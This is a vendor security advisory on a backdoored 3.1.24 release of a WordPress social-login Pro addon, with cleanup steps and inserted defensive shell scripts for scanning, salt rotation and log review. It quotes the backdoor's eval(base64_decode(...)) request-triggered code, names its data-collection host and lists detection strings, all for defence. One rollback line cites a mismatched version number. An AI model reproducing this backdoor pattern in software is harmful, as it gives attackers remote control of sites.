⚠️ Security Advisory: Nextend Social Login Pro Addon 3.1.24 Compromise

Description

A security breach affected the update system responsible for distributing Nextend Social Login Pro Addon for WordPress. Unauthorized parties released a malicious version 3.1.24, which may have been installed on some websites.

Once detected, the issue was contained and a fixed version 3.1.25 was released.

⚠️ Important:

  • Only the Pro Addon is affected
  • The free version is NOT affected

Affected Versions

Version   Status           Action Required
3.1.24    ❌ Compromised   Immediate action required
3.1.25    ✅ Safe          No action needed
3.1.23    ✅ Safe          No action needed

What the Malware Does

The malicious code in version 3.1.24 introduces a hidden backdoor.

It may:

  • Allow remote code execution via HTTP requests: eval(base64_decode($_REQUEST['d']));
  • Use a hidden trigger parameter: _wpc_eval (with a hash check)
  • Generate a secret key based on your site: md5(AUTH_KEY . DB_NAME)
  • Send site information to an external server: https://wpjs1.com/api/v3/register-agent
  • Store a marker in the database: _wpc_reg

⚠️ This malware does NOT create admin users, but it allows full remote control of the site.


🔄 Server Rollback

If you have an available backup point, we strongly recommend rolling back your server to a backup created before version 3.5.1.35.
The compromised update was released by the attacker on April 7, 2026. Due to time zone differences, it is safest to restore from a backup dated April 5, 2026 or earlier.
This ensures that any potentially malicious files are completely removed, as they were never present in the restored backup.

How to Roll Back

  1. Log in to your server hosting provider’s dashboard
  2. Look for a section related to backups, snapshots, or restore points
  3. Find a backup created before version 3.1.24
  4. Use the available restore/rollback option to restore that backup

⚠️ Backup and restore options vary between providers.

If you’re unsure how to proceed, please contact your hosting provider’s support for assistance.

Reset Your Credentials

After restoring your server, it is still recommended to regenerate your credentials as described below, as the attacker might have accessed them.

If you don’t have a backup, then proceed with the manual cleanup method described below.


🛠 Manual Cleanup Guide

Follow these steps if your site used version 3.1.24.


1. Put Site in Maintenance Mode

Restrict access during cleanup to prevent exploitation.


2. Create a Backup

Backup:

  • Files
  • Database

Mark it as an infected backup.


3. Remove the Infected Plugin Completely

Delete the entire plugin directory:

wp-content/plugins/nextend-social-login-pro/

Then reinstall version 3.1.25.

⚠️ Do not leave any old files behind.


4. Verify No Backdoor Code Remains

If you inspect files manually, ensure the following malicious block is NOT present anywhere:

Code
if(isset($_REQUEST['_wpc_eval']) && ... ){
    eval(base64_decode($_REQUEST['d']));
    exit;
}

Also search for:

  • _wpc_eval
  • wpjs1.com
  • eval(base64_decode
  • shell_exec

Remove any matches found.


5. Remove Malicious Database Entry

Open your database (wp_options table) and delete:

_wpc_reg

This is used by the malware to track infected sites.


6. Search Entire Site for Backdoors

Even though this variant is simpler, always verify full cleanup.

Search all files for:

  • eval(base64_decode
  • _wpc_eval
  • wpjs1.com

Check especially:

  • wp-content/
  • themes/
  • uploads/
  • mu-plugins/
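One way to run the searches from steps 4 and 6 in a single pass (the same scan also catches the WP_CACHE_SALT and WPCacheSalt leftovers from steps 8 and 9), as an added example that is not part of the advisory or the vendor's tooling. It greps a directory you pass in; the demo builds a throwaway tree with a planted marker file, so the paths and contents below are constructed.

```shell
#!/bin/sh
# Added example (not from the advisory or the plugin vendor): grep a WordPress
# tree for every indicator string the advisory lists, printing file:line:text.
# Returns 0 when nothing matched and 1 when at least one file needs review.
scan_backdoor_indicators() {
    root="$1"
    found=0
    # Literal strings taken from the advisory (steps 4, 6, 8 and 9).
    # shell_exec also appears in some legitimate plugins: review those hits by hand.
    for pat in '_wpc_eval' 'wpjs1.com' 'eval(base64_decode' 'shell_exec' \
               'WP_CACHE_SALT' 'WPCacheSalt'; do
        # -r recurse, -n line numbers, -F literal match, -I skip binary files
        if grep -rnFI -e "$pat" -- "$root" 2>/dev/null; then
            found=1
        fi
    done
    return $found
}

# Demo on a constructed tree: one clean plugin file and one planted file in
# uploads/ carrying two of the markers as plain comments (nothing executable).
demo_scan() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/wp-content/plugins/clean" "$tmp/wp-content/uploads"
    printf '<?php\necho "hello";\n' > "$tmp/wp-content/plugins/clean/clean.php"
    printf '<?php\n// planted marker: _wpc_eval\n// planted host: wpjs1.com\n' \
        > "$tmp/wp-content/uploads/cache.php"
    if scan_backdoor_indicators "$tmp"; then
        echo "RESULT: clean"
    else
        echo "RESULT: indicators found, review the matches above"
    fi
    rm -rf "$tmp"
}
```

Run it against the WordPress root rather than only wp-content/, so wp-config.php and .htaccess are covered too.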

7. Reinstall WordPress Core (Recommended)

To be safe:

  • Download WordPress from the official source
  • Replace all core files except:
    • wp-config.php
    • wp-content/uploads/

8. Clean up the wp-config.php

Check your wp-config.php file.

Remove this constant if it exists:

Code
define('WP_CACHE_SALT', '<token>');

Change the WordPress Security Keys (Salts):

  1. Generate new security keys here: https://api.wordpress.org/secret-key/1.1/salt/
  2. Open your website’s wp-config.php file
  3. Replace the existing keys (AUTH_KEY, SECURE_AUTH_KEY, etc.) with the new ones. Make sure you replace the existing salts rather than adding the new block a second time, as defining constants twice could cause errors.
  4. Save the file

This will also log out all users and invalidate existing sessions.
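An added example for step 8 (not the vendor's code): with the block from the generator URL saved to a file, it rewrites the matching salt lines in wp-config.php in place, so no constant ends up defined twice, and drops any WP_CACHE_SALT line. The file names and sample values in the demo are constructed, and a real salt block has eight define() lines.

```shell
#!/bin/sh
# Added example (not from the advisory): replace the salt constants in
# wp-config.php line by line with the freshly generated ones, instead of
# appending the new block (which would define each constant twice), and
# remove the WP_CACHE_SALT constant the advisory says to delete.
replace_salts() {   # usage: replace_salts wp-config.php new-salts.txt
    cfg="$1"; new="$2"
    cp -- "$cfg" "$cfg.bak"            # keep the original next to the file
    awk -v q="'" -v newfile="$new" '
      BEGIN {                           # index new define() lines by constant name
        while ((getline line < newfile) > 0) {
          if (index(line, "define(") == 1) { split(line, f, q); repl[f[2]] = line }
        }
      }
      /^[ \t]*define[ \t]*\(/ {         # matches define(KEY and define( KEY alike
        split($0, f, q)                 # f[2] is the constant name between quotes
        if (f[2] == "WP_CACHE_SALT") next
        if (f[2] in repl) { print repl[f[2]]; delete repl[f[2]]; next }
      }
      { print }
      END { for (k in repl) print "WARNING: " k " missing from config, add: " repl[k] > "/dev/stderr" }
    ' "$cfg.bak" > "$cfg"
}

# Demo on constructed files: old-style spacing, a stale salt, a WP_CACHE_SALT
# line, and one generated constant the config does not have yet.
demo_replace_salts() {
    tmp=$(mktemp -d)
    cat > "$tmp/wp-config.php" <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define( 'AUTH_KEY',         'old-auth-key' );
define( 'SECURE_AUTH_KEY',  'old-secure-auth-key' );
define('WP_CACHE_SALT', 'placeholder-token');
define( 'WP_DEBUG', false );
EOF
    cat > "$tmp/new-salts.txt" <<'EOF'
define('AUTH_KEY',         'NEW-AUTH-KEY-%^&*()');
define('SECURE_AUTH_KEY',  'NEW-SECURE-AUTH-KEY');
define('NONCE_SALT',       'NEW-NONCE-SALT');
EOF
    replace_salts "$tmp/wp-config.php" "$tmp/new-salts.txt" 2>&1
    cat "$tmp/wp-config.php"
    rm -rf "$tmp"
}
```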


9. Clean up the .htaccess

Check your .htaccess file in the WordPress root folder and remove the comment if present:

Code
# WPCacheSalt <token>

10. Reinstall Plugins and Themes

  • Remove all plugins
  • Reinstall only from trusted sources
  • Remove unused or unknown plugins

11. Change All Passwords

Even if no admin user was created, assume compromise.

Change:

  • WordPress admin passwords
  • Hosting account
  • FTP / SSH
  • Database password

How to reset the WordPress admin passwords:

  1. Log in to your WordPress dashboard: /wp-admin
  2. Go to Users → All Users (/wp-admin/users.php)
  3. For each user with the Administrator role:
    • Click Edit
    • Scroll down to the Account Management section
    • Click Set New Password (WordPress will generate a strong password automatically)
    • Click Update User to save

Tip: You can also use the “Send password reset” option so each administrator can set their own password securely.


Changing the Database password:

  1. Please contact your hosting provider for guidance on how to change your WordPress database user password.
  2. After changing it, open wp-config.php
  3. Update the value of this constant to the new password that you generated:

Code
define('DB_PASSWORD', 'your-new-password');



Changing the FTP / SSH and Hosting account credentials:
Please contact your hosting provider for guidance on how to change these credentials.


12. Review Logs

Check:

  • access logs
  • admin activity

Look for:

  • _wpc_eval requests
  • unusual POST requests
  • unknown access patterns
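An added example, not from the advisory, for the log review in step 12. It assumes a combined-format access log (the default for Apache and nginx), lists every request that carries the _wpc_eval trigger, and then counts POST requests per client and path so unusual posting patterns stand out; the sample lines and addresses are constructed.

```shell
#!/bin/sh
# Added example (not from the advisory): review an access log in combined
# format for the two things step 12 asks about, requests carrying the
# _wpc_eval trigger and unusual POST activity, grouped by client IP and path.
review_access_log() {   # usage: review_access_log /path/to/access.log
    log="$1"
    echo "== Requests carrying the _wpc_eval trigger =="
    grep -F '_wpc_eval' -- "$log" || echo "(none)"
    echo "== POST requests by client and path, most frequent first =="
    # $1 = client IP, $6 = method (with its leading quote), $7 = request path
    awk '$6 == "\"POST" { p = $7; sub(/\?.*/, "", p); c[$1 " " p]++ }
         END { for (k in c) print c[k], k }' "$log" | sort -rn
}

# Demo on a constructed log: a normal visitor, plus one client that hits the
# trigger once and then keeps POSTing to index.php. Addresses are from the
# TEST-NET documentation ranges; the trigger value is a placeholder.
demo_review_log() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
198.51.100.7 - - [07/Apr/2026:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Apr/2026:10:02:10 +0000] "POST /?_wpc_eval=placeholder HTTP/1.1" 200 12 "-" "curl/8.0"
203.0.113.5 - - [07/Apr/2026:10:02:11 +0000] "POST /index.php HTTP/1.1" 200 12 "-" "curl/8.0"
203.0.113.5 - - [07/Apr/2026:10:02:12 +0000] "POST /index.php HTTP/1.1" 200 12 "-" "curl/8.0"
198.51.100.7 - - [07/Apr/2026:10:05:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 56 "-" "Mozilla/5.0"
EOF
    review_access_log "$tmp"
    rm -f "$tmp"
}
```

Because the backdoor reads $_REQUEST, the trigger can also arrive in a POST body, which access logs do not record; an empty first section is therefore not proof of absence, and the POST summary is the fallback.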

13. Verify Security Plugins

The malware could have disabled or modified the security plugins (e.g. Wordfence).

  • Reinstall and re-enable them
  • Run a full scan

14. Harden the Site

After cleanup:

  • Enable 2FA for admin users
  • Keep everything updated
  • Use strong passwords
  • Remove unused plugins

Summary

  • Version 3.1.24 was malicious
  • Version 3.1.25 is safe
  • Version 3.1.23 and earlier are unaffected
  • Only the Pro Addon is impacted
  • Cleanup plugin does NOT fix this variant
  • Manual cleanup is required

Final Recommendation

If version 3.1.24 was installed:

👉 Treat the site as compromised
👉 Perform full manual cleanup
👉 Reset all credentials
